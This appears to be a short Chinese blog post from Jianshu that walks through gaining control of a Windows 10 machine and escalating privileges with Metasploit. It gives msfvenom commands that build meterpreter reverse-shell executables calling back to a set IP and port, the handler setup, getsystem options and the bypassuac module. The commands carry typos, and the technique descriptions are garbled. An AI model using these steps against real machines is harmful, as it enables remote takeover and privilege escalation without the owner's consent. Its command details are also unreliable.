Windows10 bypassuac 提权

一、 远控

    a) X86

        msfvnom –p payload/windows/meterpreter/reverse_tcp           # 32位

        msfvnom –p payload/windows/x64/meterpreter/reverse_tcp    # 64位

        i. LHOST=192.168.135.129 #指定反弹shell地址

        ii. LPORT=4444 #指定反弹shell端口

        iii. –f exe #生成文件类型

        iv. –o /root/DeskTop/name.exe #生成路径及文件名

二、 建立会话

    a) use exploit/multi/handler

        set payload windows/x64/meterpreter/reverse_tcp

        set payload windows/meterpreter/reverse_tcp

        i. set LHOST 192.168.135.129 #监听地址

        ii. set LPORT 4444 #监听端口

        iii. exploit / run #执行

        iv. background #挂起会话

三、 提权

    a) 命令(进入会话)

        getuid #获取用户id

        getsystem #获取sys权限

            1. –t 0 # 所有可用的技术(1,2,3)

            2. –t 1 # 命名管道模拟(在内存/管理中)

            3. –t 2 # 被命名为管道模拟(下拉/admin)

            4. –t 3 # 标记重复(在内存/管理中)

        search bypassuac

    b) 使用bypassuac(绕过用户帐户控制)


        set payload windows/x64/meterprese/reverse_tcp

        set target 1 #设置目标为x64,0:x86

本文连接:http://www.jianshu.com/p/11284bb8e231

版权声明:本文为简友原创文章,转载必须写明出处。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容